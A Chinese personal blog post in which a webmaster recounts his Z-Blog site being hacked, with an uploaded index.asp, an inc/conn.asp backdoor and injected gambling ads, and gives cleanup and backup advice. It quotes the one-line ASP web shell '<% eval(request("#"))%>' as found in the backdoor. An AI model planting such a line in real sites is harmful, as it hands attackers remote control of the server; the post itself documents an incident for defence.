爱小志博客网站被黑及其应对

今天中午12点多用手机访问我的网站还是好好的，等到下午4点多来打开网站的时候，发现网站打开之后，页面错位乱码，原来是网站被黑客攻击了，于是，我立刻用FTP软件登录虚拟主机空间，并且，按照时间顺序排列文件。发现果然不对劲，有人在我虚拟主机空间上传了一个index.asp文件，然后我查看z-blog 2.1原版源码程序，发现并没有index.asp文件，所以，我断定，这个肯定是黑客上传上上去的，于是，我把这个文件立刻删除了，在访问网站的时候，果然能够正常访问了。另外，我看见还有一个文件夹名称为“inc”，其日期是今天最新的日期，我打开进入，发现里面有一个文件名称是coon.asp，但是，我查看原版的z-blog程序，发现并没有一个文件夹是inc，所以，我就果断把这个文件删除了。

下面图片是我网站被攻击之后打开的页面：

我们发现，其中有一些乱码的字符，比如“��?”，“br>”等等，之后，我又查看了网页的源代码，发现在代码的底部，挂的全部都是“博彩”和“赌场”的网站广告代码，

这个情况，应该说我不是第一次遇见了，但是，网站打开之后是乱码的情况还是第一次出现，以前我有个网站也是挂的什么淘宝商城或者是什么医疗机构，或者是什么博彩网站的广告，但是都是隐藏起来的网站链接和代码，一般我们直接打开网站之后不能直接看见这些链接，所以，我们也通常很难发现这些恶意广告链接，这些隐藏的恶意链接，很容易造成我们网站被百度，谷歌等网站降权，甚至网站被K，所以，我们需要经常查看自己的网站首页源码，最好是下载查看和分析网站日志。

另外，我通过把inc文件夹里面的的conn.asp文件下载到本地，用记事本打开之后，发现里面的代码只有一段，如下图：

我们通过在百度搜索这段代码，发现果然有很多网站有被挂上这段代码：

而且，很多挂上这个代码的，都是网站的首页标题，不得不说，网站管理员到底干哈去了？

爱小志估计代码中的“qweqwe1”应该是一个人的网络用户名，于是我们在百度搜索qweqwe1：

发现用户名称带有“qweqwe1”字符的果然不在少数，光搜索结果就达到了2万多条，这说明，用户名为qweqwe1的黑客真的是很嚣张！

还有，我们搜索“eval request”果然真相浮出了水面：

答案是“<% eval(request("#"))%>这句话是一句话小马的服务端，入侵者能利用lake2的客户端进行连接，从而得到一个网站的最高权限，更甚至，拿下这台服务器，注意站点的安全了lz”，黑客已经拿到了网站的服务器控制端。

通过这些分析，我们已经大概知道了网站服务器的问题，所以，爱小志认为，作为站长的我们，需要加强网站的安全的管理，就像这篇文章所说的《关于网赚——我想对大家说的》“黑客可以决定一个网站的生存”，所以，作为站长，尤其是个人站长的我们，需要经常对网站进行备份，备份最好是对整站进行备份，如果可以，每天都需要备份一次数据库，每周备份一次网站所有文件。备份其实很简单，只需用FTP软件登录网站虚拟主机空间，下载mdb数据库即可，其中，z-blog的数据库文件路径为：zb_users\DATA\***.mdb，其中***为您数据库的文件名称。

后记：作为个人站长其实很不容易，树大招风，何况爱小志这棵树还没有“发芽”，几乎就要被黑客扼杀在襁褓之中，究竟是爱小志得罪了各位，还是各位竞争对手网站看不惯爱小志博客呢？

另外，如果您有更好的应对措施，可以在下方给我们留言，谢谢！